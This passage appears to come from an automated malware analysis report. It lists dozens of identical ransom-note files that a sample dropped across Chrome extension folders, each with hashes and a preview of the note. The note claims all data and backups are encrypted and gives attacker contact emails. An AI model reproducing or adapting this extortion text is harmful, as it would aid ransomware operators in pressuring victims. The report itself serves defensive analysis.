                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\lv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\nl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\no\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ro\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ru\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\th\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\tr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\uk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\vi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_metadata\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ar\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\bg\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ca\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
